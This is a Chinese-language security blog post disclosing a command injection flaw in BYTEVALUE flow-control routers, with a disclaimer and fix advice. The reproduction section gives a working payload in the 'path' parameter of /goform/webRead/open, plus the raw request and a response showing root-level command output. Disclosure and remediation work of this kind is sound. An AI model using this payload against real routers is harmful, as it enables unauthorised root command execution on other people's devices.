BYTEVALUE 百为流控路由器远程命令执行漏洞

admin 2023年11月29日21:28:33评论114 views字数 799阅读2分39秒阅读模式

本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

漏洞说明

       BYTEVALUE 百为流控是一款追求完美上网体验、追求最大带宽利用率的多功能路由器,因其颠覆性的核心功能智能流控而名为百为流控路由器。

        百为智能流控路由器 /goform/webRead/open 路由的 path 参数存在命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,获取服务器权限。

影响版本

BYTEVALUE 智能流控路由器

漏洞复现

BYTEVALUE 百为流控路由器远程命令执行漏洞

payload:

/goform/webRead/open/?path=|id

请求包:

GET /goform/webRead/open/?path=%7Cid HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

响应包:

HTTP/1.0 200 OKServer: FSM-WebsPragma: no-cacheCache-control: no-cacheContent-Type: text/plain;charset=gb2312
uid=0(admin) gid=0(admin)

BYTEVALUE 百为流控路由器远程命令执行漏洞

修复建议

严格检查参数的数据类型、数值与数据长度;过滤可能产生命令注入的特殊字符,例如:$、=、'、、||、>、-、>>、等;升级版本。

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路


原文始发于微信公众号(才疏学浅的H6):BYTEVALUE 百为流控路由器远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月29日21:28:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BYTEVALUE 百为流控路由器远程命令执行漏洞http://cn-sec.com/archives/2251914.html

发表评论

匿名网友 填写信息